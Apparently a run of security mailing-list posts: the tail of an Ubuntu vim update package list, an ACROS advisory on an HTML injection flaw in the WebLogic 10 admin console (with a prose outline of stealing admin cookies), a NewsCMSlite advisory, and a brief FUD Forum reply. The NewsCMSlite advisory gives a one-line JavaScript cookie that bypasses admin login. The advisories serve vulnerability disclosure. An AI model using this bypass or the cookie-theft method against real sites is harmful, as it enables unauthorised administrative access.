http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_6.4-006+2ubuntu6.2_amd64.deb Size/MD5: 664378 f99c5f44f075e507727cfde6e4f4ac5c http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-gtk_6.4-006+2ubuntu6.2_amd64.deb Size/MD5: 842724 3121ac81e306aca18d1ce7a8de71ba9e http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-perl_6.4-006+2ubuntu6.2_amd64.deb Size/MD5: 846792 705dcb476de0bb335ffdf74f7f0596a0 http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-python_6.4-006+2ubuntu6.2_amd64.deb Size/MD5: 842742 98bd00409e7bc852a53ecc019ee89b28 http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-ruby_6.4-006+2ubuntu6.2_amd64.deb Size/MD5: 838130 6e1b1064fb3aa016ba69fc77b6be912b http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-tcl_6.4-006+2ubuntu6.2_amd64.deb Size/MD5: 800738 708dfae6260edef8c7dcc5f8d4cf9c81 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-common_6.4-006+2ubuntu6.2_i386.deb Size/MD5:83114 9831f107a9a9b5544265e2ab53eb5afb http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gnome_6.4-006+2ubuntu6.2_i386.deb Size/MD5: 713796 32f00306228eecffa22a77de84ae0949 http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gui-common_6.4-006+2ubuntu6.2_i386.deb Size/MD5:70036 ffca389f01faaaf229ed4a016d37274d http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-tiny_6.4-006+2ubuntu6.2_i386.deb Size/MD5: 366068 76ea071f100dcad8de93b685b278dcf5 http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_6.4-006+2ubuntu6.2_i386.deb Size/MD5: 555212 34446768f4d4bf93e189e9d98752d9a6 http://security.ubuntu.com/ubuntu/pool/univers
ACROS Security: HTML Injection in BEA (Oracle) WebLogic Server Console (ASPR #2009-01-27-1)
=[BEGIN-ACROS-REPORT]= PUBLIC = ACROS Security Problem Report #2009-01-27-1 - ASPR #2009-01-27-1: HTML Injection in BEA WebLogic Server Console = Document ID: ASPR #2009-01-27-1-PUB Vendor: ORACLE (http://www.oracle.com) Target: Oracle WebLogic Server 10.0 Impact: There is an HTML Injection vulnerability in WebLogic Server 10 Administration Console that allows the attacker to gain administrative access to the server. Severity:High Status: Official patch available, workarounds available Discovered by: Sasa Kos of ACROS Security Current version http://www.acrossecurity.com/aspr/ASPR-2009-01-27-1-PUB.txt Summary === There is an HTML Injection vulnerability in WebLogic Server 10 Administration Console that allows the attacker to gain administrative access to the server. It is possible to craft such URL that will, when requested from the server, return a document with arbitrarily chosen HTML injected. An obvious use for this type of vulnerability is cross- site scripting that can be used, among other things, for obtaining session cookies from WebLogic administrators. These cookies, when stolen, provide the attacker with administrative access to WebLogic Administration Console, compromising the security of the entire web server. This vulnerability is exploitable even if the Administration Console is only being accessed via HTTPS, and even if the Administrative Port is enabled. Product Coverage - WebLogic Server 10.0 Note: Our tests were only performed on the above product version. Other versions may or may not be affected. Analysis Some URL argument in the WebLogic Server 10 Administration Console is not properly sanitized against HTML injection, which allows the attacker to introduce additional, malicious HTML to the server's response. The most common type of HTML injection is injection of malicious client-side script, commonly known as cross-site scripting. In an actual attack the user would not be required to open URLs specified by the attacker. Instead, a malicious web page visited by the logged-in WebLogic administrator would mount the entire attack automatically and covertly. For instance, a tiny 0x0 pixel iframe could be used for loading the URL from the demonstration immediately upon administrator's visit to the malicious page, injecting the malicious script to the WebLogic server's response. This malicious script would then silently send these cookies to the attacker's server, where she could pick them up and use them for entering the administrator's session in the Administration Console. Mitigating Factors == - In order to execute the above attack, the attacker would need to make the administrator's browser visit a malicious web page while the administrator is logged into the Administration Console. This can be achieved using social engineering, network traffic modification or a combination of both. - If the attacker manages to obtain a valid ADMINCONSOLESESSION cookie (and optionally _WL_AUTHCOOKIE_ADMINCONSOLESESSION cookie), these will only be useful until the administrator logs out of the Administration Console. However, the attacker knowing that might rush to create a new administrative user in the console and use that user for WebLogic administration after the legitimate administrator has logged off. Solution ORACLE has issued a security bulletin [1] and published a patch which fixes this issue. Workaround == - WebLogic administrators can be trained not to browse other web pages while logged in to the Administration Console. However, since some hyperlinks in the console point to servers on the Internet (e.g., http://support.bea.com) the attacker could watch the administrator's Internet traffic and detect such requests as a strong sign that the administrator is currently logged in to the Administration Console. She would then slightly modify the Internet server's response so as to include the malicious code. Such an attack could only be mounted by attackers capable of monitoring and modifying the administrator's Internet traffic (most likely an ISP or someone who broke into an ISP). - The WebLogic Administration Console can be disabled, which would neutralize this vulnerability. References == [1] Oracle Critical Patch Update Advisory - January 2009 http://www.oracle.com/technology/deploy/security/critical-patch- updates/cpujan2009.html Acknowledgments === We would like to acknowledge BEA Systems and Oracle Corporation for professional handling of the identified vulnerability. Contact === ACROS d.o.o. Makedon
NewsCMSlite Insecure Cookie Handling
## www.BugReport.ir # # # AmnPardaz Security Research Team # # Title:NewsCMSlite # Vendor: http://www.katywhitton.com # Bug: Insecure Cookie Handling # Exploitation: Remote with browser # Fix: N/A # Original Advisory:http://www.bugreport.ir/index_62.htm ### - Description: NewsCMSlite is an easy way to get regularly updated content onto your site without the need for programming skills or employing a Web Maintenance engineer. The system allows you to update your news, articles, diary etc.dynamically using an Access Database to store the content. - Vulnerability: +-->Insecure Cookie Handling Because of improper access restriction to the administration section, It is possible to bypass the authentication mechanism and gain access to the administration section by setting the "loggedIn" cookie to "xY1zZoPQ" Code Snippet: /newsadmin.asp #line:73-101 if pageView="login" THEN ' Nothing ELSE if (Request.Cookies("loggedIn")="") OR (Request.Cookies("loggedIn")<>"xY1zZoPQ") THEN %> . . . <% ELSE %> <%if pageView="" THEN ' The User is logged in with permission ' to view the admin section so we ' display the article list and ' options menu - POC: javascript:document.cookie = "loggedIn=xY1zZoPQ; path=/" - Solution: Restrict and grant only trusted users access to the resources. Edit the source code to ensure that inputs are properly sanitized. - Credit : AmnPardaz Security Research & Penetration Testing Team Contact: admin[4t}bugreport{d0t]ir www.BugReport.ir www.AmnPardaz.com
Re: FUD Forum < 2.7.1 PHP code injection vurnelability
It's very old one, and it was fixed at the time of reporting to one of devs.